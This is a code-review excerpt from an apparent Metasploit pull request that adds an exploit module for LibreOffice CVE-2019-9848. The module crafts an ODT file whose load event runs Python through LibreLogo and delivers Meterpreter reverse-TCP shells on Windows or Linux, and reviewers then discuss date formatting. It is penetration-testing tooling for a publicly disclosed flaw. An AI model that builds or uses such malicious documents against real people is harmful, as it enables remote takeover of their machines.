modules/exploits/multi/fileformat/libreoffice_logo_exec.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreOffice Macro Python Code Execution',
+      'Description'    => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them.
+
+        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
+
+        This module generates an ODT file with a dom loaded event that,
+        when triggered, will execute arbitrary python code and the metasploit payload.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nils Emmerich',    # Vulnerability discovery and PoC
+        'Shelby Pace',      # Based on this module (exploiting CVE-2018-16858)
+        'LoadLow'           # This msf module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-9848' ],
+          [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
+        ],
+     'Platform'       => [ 'win', 'linux' ],
+     'Arch'           => [ ARCH_X86, ARCH_X64 ],
+     'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        =>  'win',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'payload'         =>  'windows/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'payload'         =>  'linux/x86/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependFork' =>  true },
+              'CmdStagerFlavor' =>  'printf',
+            }
+          ]
+        ],
+      'DisclosureDate'  =>  "2019-07-16",
```

Comment:
Are we still using the `Mon day year` format for `DisclosureDate`? If so, this should be changed to `Jul 16 2019`

Reply:
Also single quotes

Reply:
> 
> 
> Are we still using the `Mon day year` format for `DisclosureDate`? If so, this should be changed to `Jul 16 2019`

ISO date format is acceptable and objectively superior.